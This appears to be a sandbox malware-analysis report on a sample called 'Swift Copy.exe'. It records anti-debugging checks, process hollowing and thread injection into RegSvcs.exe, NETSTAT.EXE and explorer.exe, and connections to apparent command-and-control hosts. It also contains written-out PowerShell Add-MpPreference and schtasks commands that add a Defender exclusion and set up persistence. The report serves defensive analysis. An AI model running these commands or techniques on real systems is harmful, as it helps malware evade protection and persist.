Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CAD30 mov eax, dword ptr fs:[00000030h]	8_2_018CAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01903D43 mov eax, dword ptr fs:[00000030h]	8_2_01903D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01943540 mov eax, dword ptr fs:[00000030h]	8_2_01943540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01973D40 mov eax, dword ptr fs:[00000030h]	8_2_01973D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E7D50 mov eax, dword ptr fs:[00000030h]	8_2_018E7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EC577 mov eax, dword ptr fs:[00000030h]	8_2_018EC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EC577 mov eax, dword ptr fs:[00000030h]	8_2_018EC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D849B mov eax, dword ptr fs:[00000030h]	8_2_018D849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01998CD6 mov eax, dword ptr fs:[00000030h]	8_2_01998CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019814FB mov eax, dword ptr fs:[00000030h]	8_2_019814FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h]	8_2_01946CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h]	8_2_01946CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h]	8_2_01946CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0199740D mov eax, dword ptr fs:[00000030h]	8_2_0199740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0199740D mov eax, dword ptr fs:[00000030h]	8_2_0199740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0199740D mov eax, dword ptr fs:[00000030h]	8_2_0199740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]	8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h]	8_2_01946C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h]	8_2_01946C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h]	8_2_01946C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h]	8_2_01946C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FBC2C mov eax, dword ptr fs:[00000030h]	8_2_018FBC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FA44B mov eax, dword ptr fs:[00000030h]	8_2_018FA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0195C450 mov eax, dword ptr fs:[00000030h]	8_2_0195C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0195C450 mov eax, dword ptr fs:[00000030h]	8_2_0195C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E746D mov eax, dword ptr fs:[00000030h]	8_2_018E746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]	8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]	8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]	8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]	8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]	8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]	8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]	8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]	8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]	8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]	8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]	8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01947794 mov eax, dword ptr fs:[00000030h]	8_2_01947794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01947794 mov eax, dword ptr fs:[00000030h]	8_2_01947794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01947794 mov eax, dword ptr fs:[00000030h]	8_2_01947794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D8794 mov eax, dword ptr fs:[00000030h]	8_2_018D8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019037F5 mov eax, dword ptr fs:[00000030h]	8_2_019037F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FA70E mov eax, dword ptr fs:[00000030h]	8_2_018FA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FA70E mov eax, dword ptr fs:[00000030h]	8_2_018FA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0195FF10 mov eax, dword ptr fs:[00000030h]	8_2_0195FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0195FF10 mov eax, dword ptr fs:[00000030h]	8_2_0195FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0199070D mov eax, dword ptr fs:[00000030h]	8_2_0199070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0199070D mov eax, dword ptr fs:[00000030h]	8_2_0199070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EF716 mov eax, dword ptr fs:[00000030h]	8_2_018EF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C4F2E mov eax, dword ptr fs:[00000030h]	8_2_018C4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C4F2E mov eax, dword ptr fs:[00000030h]	8_2_018C4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EB73D mov eax, dword ptr fs:[00000030h]	8_2_018EB73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EB73D mov eax, dword ptr fs:[00000030h]	8_2_018EB73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FE730 mov eax, dword ptr fs:[00000030h]	8_2_018FE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018DEF40 mov eax, dword ptr fs:[00000030h]	8_2_018DEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018DFF60 mov eax, dword ptr fs:[00000030h]	8_2_018DFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01998F6A mov eax, dword ptr fs:[00000030h]	8_2_01998F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0195FE87 mov eax, dword ptr fs:[00000030h]	8_2_0195FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019446A7 mov eax, dword ptr fs:[00000030h]	8_2_019446A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h]	8_2_01990EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h]	8_2_01990EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h]	8_2_01990EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F36CC mov eax, dword ptr fs:[00000030h]	8_2_018F36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01998ED6 mov eax, dword ptr fs:[00000030h]	8_2_01998ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0197FEC0 mov eax, dword ptr fs:[00000030h]	8_2_0197FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01908EC7 mov eax, dword ptr fs:[00000030h]	8_2_01908EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F16E0 mov ecx, dword ptr fs:[00000030h]	8_2_018F16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D76E2 mov eax, dword ptr fs:[00000030h]	8_2_018D76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h]	8_2_018CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h]	8_2_018CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h]	8_2_018CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F8E00 mov eax, dword ptr fs:[00000030h]	8_2_018F8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981608 mov eax, dword ptr fs:[00000030h]	8_2_01981608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FA61C mov eax, dword ptr fs:[00000030h]	8_2_018FA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FA61C mov eax, dword ptr fs:[00000030h]	8_2_018FA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0197FE3F mov eax, dword ptr fs:[00000030h]	8_2_0197FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CE620 mov eax, dword ptr fs:[00000030h]	8_2_018CE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]	8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]	8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]	8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]	8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]	8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]	8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198AE44 mov eax, dword ptr fs:[00000030h]	8_2_0198AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198AE44 mov eax, dword ptr fs:[00000030h]	8_2_0198AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D766D mov eax, dword ptr fs:[00000030h]	8_2_018D766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]	8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]	8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]	8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]	8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]	8_2_018EAE73

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_019099A0 NtCreateSection,LdrInitializeThunk,

8_2_019099A0

Source: C:\Users\user\Desktop\Swift Copy.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.92.235.55 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mogdento.com
Source: C:\Windows\explorer.exe	Network Connect: 103.67.235.120 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.3.130.2 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 85.159.66.93 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.kinemartigues.com
Source: C:\Windows\explorer.exe	Network Connect: 51.159.175.169 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.blackyaga.xyz
Source: C:\Windows\explorer.exe	Domain query: www.epic45.co.uk
Source: C:\Windows\explorer.exe	Domain query: www.expectedclosure.one

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 370000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Swift Copy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10F1008	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Swift Copy.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 3968			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 3968			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Swift Copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
Source: C:\Users\user\Desktop\Swift Copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe			Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: explorer.exe, 0000000B.00000000.380716731.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.334501812.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.287445550.0000000000688000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanEXE^
Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.339209169.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.306173518.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.381188687.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.317860532.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.287493311.000000000069D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: WProgram Manager

Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Users\user\Desktop\Swift Copy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
